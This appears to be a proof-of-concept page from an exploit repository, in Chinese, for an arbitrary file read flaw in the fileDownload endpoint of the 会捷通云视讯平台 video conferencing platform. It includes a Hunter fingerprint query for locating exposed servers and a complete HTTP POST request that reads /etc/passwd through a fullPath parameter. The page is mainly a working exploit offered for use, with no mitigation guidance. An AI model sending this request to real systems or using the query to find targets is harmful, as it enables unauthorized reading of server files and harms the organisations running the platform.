POC/wpoc/会捷通云视讯平台/会捷通云视讯平台任意文件读取漏洞.md

36 lines
1.6 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# 会捷通云视讯平台任意文件读取漏洞
# 一、漏洞复现
<font style="color:rgb(0,0,0);">会捷通云视讯平台是基于软视频会议在私有云或者公有云环境下提供的企业级视频通讯平台可以为用户提供跨越企业内外基于会议室、桌面和移动应用的视频通讯和会议解决方案会捷通云视讯平台平台fileDownload处存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件。</font>
# <font style="color:rgb(0,0,0);">二、影响版本</font>
+ <font style="color:rgb(0,0,0);">会捷通云视讯平台</font>
# <font style="color:rgb(0,0,0);">三、资产测绘</font>
+ hunter`web.body="/him/api/rest/v1.0/node/role"`
+ 特征
![1699886043031-85921d94-a0de-4ee2-b42e-019690c22439.png](./img/LdsjjeXaM_Wwu42w/1699886043031-85921d94-a0de-4ee2-b42e-019690c22439-950668.png)
# 四、漏洞复现
```plain
POST /fileDownload HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
action=downloadBackupFile&fullPath=/etc/passwd
```
![1699886073566-3a3c1975-ac9a-4dfa-b1fd-af7c9d921c50.png](./img/LdsjjeXaM_Wwu42w/1699886073566-3a3c1975-ac9a-4dfa-b1fd-af7c9d921c50-061757.png)
> 更新: 2024-02-29 23:55:45
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cbnq9fgdga6chkxw>